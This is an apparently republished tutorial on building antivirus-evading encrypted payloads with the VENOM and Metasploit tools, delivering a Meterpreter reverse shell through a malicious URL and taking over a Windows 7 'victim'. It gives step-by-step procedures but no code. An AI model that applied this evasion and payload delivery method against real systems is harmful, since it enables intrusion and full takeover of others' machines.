Nowadays many Malware and Payloads are using Encryption techniques and packing techniques using Packers to Evade the Anti Virus Software since AV is Difficult to detect the Encrypted and packed Malware and payload.
Here we are going to learn about generating Encrypted Payloads using VENOM – Metasploit Shellcode generator/compiler/listener tool.
According to description of this VENOM,The script will use MSF venom (Metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), inject the shellcode generated into one function (example: python)
The python function will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recipe the remote connection (reverse shell or meterpreter session).
Since this tool is not a default tool, we need to Download and Install into your Kali Linux.
please use this link to Download VENOM from Sourceforge Website Download Link.
Once Downloaded the Tool Extract the ZIP and run the Tool.Here i kept the package in my Desktop.
After Launch the tool, it will ask to click ok to continue for proceed further options.
Next Process will show you the information about the Option Built, Target Machine, payload format, and output.
The are 20 Different Type of option builds shellcode are listed here. we are using shellcode number 10 for this Demonstration.
so here we Chose Venom shellcode number 10 and press OK.
In This Step, we need to set up the Local host IP address. so enter your Local machine IP address for listening to the payload and press ok for next setting information.
Once we have to set our LHOST, it will Ask you to Enter you LPORT . Provide your Desire LPORT number then Press OK .
Venom contains some Default msf payloads. Here we using “windows/meterpreter/reverse_tcp”
Step 6 :
Here you can Provide your payload name that you’re going to generate.Once select the name press OK.
Once Encrypted Payload Successfully Generated, then it will be stored into output Folder of the Venom Package.
I have done scanning process for checking the Anti Virus Vendor Detection, after Successfully generating our Encryption Payload. so we have successfully Evade the AV Detection.
Here let us bypass the Victim using Metasploit with our Encrypted payload.
we need to start the Apache server to Deliver our Malicious Payload into Victims Machine. once you select the server Click ok to Continue.
In this step, we need to concentrate with Post Exploitation Module.Here we can choose any one of post Exploitation.
I need to gain access only system information so I have chosen sysinfo.rc for the post exploitation of target machine.
since it’s an Optional one, you can even perform manually this Module then you can bypass the Victim using Metasploit.
Finally, i have generated Meterpreter session using our Encrypted payload to my Target Windows 7 Machine.
Before Start session handler, Make sure your payload has successfully injected with your Target Machine.
I have Executed my payload to my Target machine using the Malicious URL(http://192.168.56.103)that have been generated by our payload Generated VENOM.
Before Play with Metasploit, check your LPORT and LHOST Setting has been properly set for listening to the Session.
So Finally, I have Successfully Bypassed my Victims and take over the Entire access of my Target Windows 7 Machine.
If you have any Further Doubts and Queries , Kindly leave your comments. Happy Hacking.
Source : GBHackers